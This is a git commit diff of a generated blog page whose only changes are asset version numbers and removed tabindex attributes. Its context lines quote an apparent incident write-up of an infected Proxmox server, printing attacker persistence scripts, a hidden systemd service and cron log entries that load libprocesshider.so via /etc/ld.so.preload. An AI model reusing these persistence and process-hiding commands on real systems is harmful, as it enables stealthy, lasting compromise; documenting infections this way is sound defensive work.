update some content
This commit is contained in:
@@ -45,9 +45,9 @@
|
||||
|
||||
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous">
|
||||
|
||||
<link href="https://h.cowbay.org/css/style.css?v=1634607506" rel="stylesheet" id="theme-stylesheet" type='text/css' media='all'>
|
||||
<link href="https://h.cowbay.org/css/style.css?v=1635401692" rel="stylesheet" id="theme-stylesheet" type='text/css' media='all'>
|
||||
|
||||
<link href="https://h.cowbay.org/css/custom.css?v=1634607506" rel="stylesheet" type='text/css' media='all'>
|
||||
<link href="https://h.cowbay.org/css/custom.css?v=1635401692" rel="stylesheet" type='text/css' media='all'>
|
||||
<link rel="shortcut icon" href="https://h.cowbay.org/img/favicon.ico" type="image/x-icon">
|
||||
<link rel="icon" href="https://h.cowbay.org/img/favicon.ico" type="image/x-icon">
|
||||
|
||||
@@ -370,16 +370,16 @@ redirect_stderr<span style="color:#f92672">=</span>true
|
||||
pidfile<span style="color:#f92672">=</span>/etc/psdewo.pid
|
||||
stdout_logfile<span style="color:#f92672">=</span>/etc/usercenter_stdout
|
||||
</code></pre></div><p>php.sh 這個忘了是在crontab 還是/etc/profile.d/底下看到的</p>
|
||||
<pre tabindex="0"><code>#!/bin/bash
|
||||
<pre><code>#!/bin/bash
|
||||
cp -f -r -- /bin/shh /bin/.sh 2>/dev/null
|
||||
/bin/.sh -c >/dev/null 2>&1
|
||||
rm -rf -- .sh 2>/dev/null
|
||||
</code></pre><p>supervisor.sh</p>
|
||||
<pre tabindex="0"><code>#!/bin/bash
|
||||
<pre><code>#!/bin/bash
|
||||
supervisord -c /etc/.supervisor/supervisord.conf >/dev/null 2>&1
|
||||
supervisorctl reload >/dev/null 2>&1
|
||||
</code></pre><p>某個 service 檔案</p>
|
||||
<pre tabindex="0"><code>[Unit]
|
||||
<pre><code>[Unit]
|
||||
Description=.sh
|
||||
|
||||
Wants=network.target
|
||||
@@ -394,7 +394,7 @@ KillMode=process
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
</code></pre><p>syslog 部份內容</p>
|
||||
<pre tabindex="0"><code>Jul 7 06:20:01 pve CRON[12502]: (root) CMD (/sbin/httpss)
|
||||
<pre><code>Jul 7 06:20:01 pve CRON[12502]: (root) CMD (/sbin/httpss)
|
||||
Jul 7 06:20:01 pve CRON[12499]: (root) CMD ( echo /usr/local/lib/libprocesshider.so > /etc/ld.so.preload && lockr +i /etc/ld.so.preload >/dev/null 2>&1)
|
||||
Jul 7 06:21:01 pve CRON[14096]: (root) CMD (/usr/lib/mysql/mysql)
|
||||
Jul 7 06:21:01 pve CRON[14095]: (root) CMD ( echo /usr/local/lib/libprocesshider.so > /etc/ld.so.preload && lockr +i /etc/ld.so.preload >/dev/null 2>&1)
|
||||
@@ -704,7 +704,7 @@ title="pinterest icon"></i>
|
||||
</div>
|
||||
<script src="https://h.cowbay.org/js/jquery.min.js"></script>
|
||||
<script src="https://h.cowbay.org/js/jquerymigrate.js"></script>
|
||||
<script src="https://h.cowbay.org/js/production.min.js?v=1634607506"></script>
|
||||
<script src="https://h.cowbay.org/js/production.min.js?v=1635401692"></script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Reference in New Issue
Block a user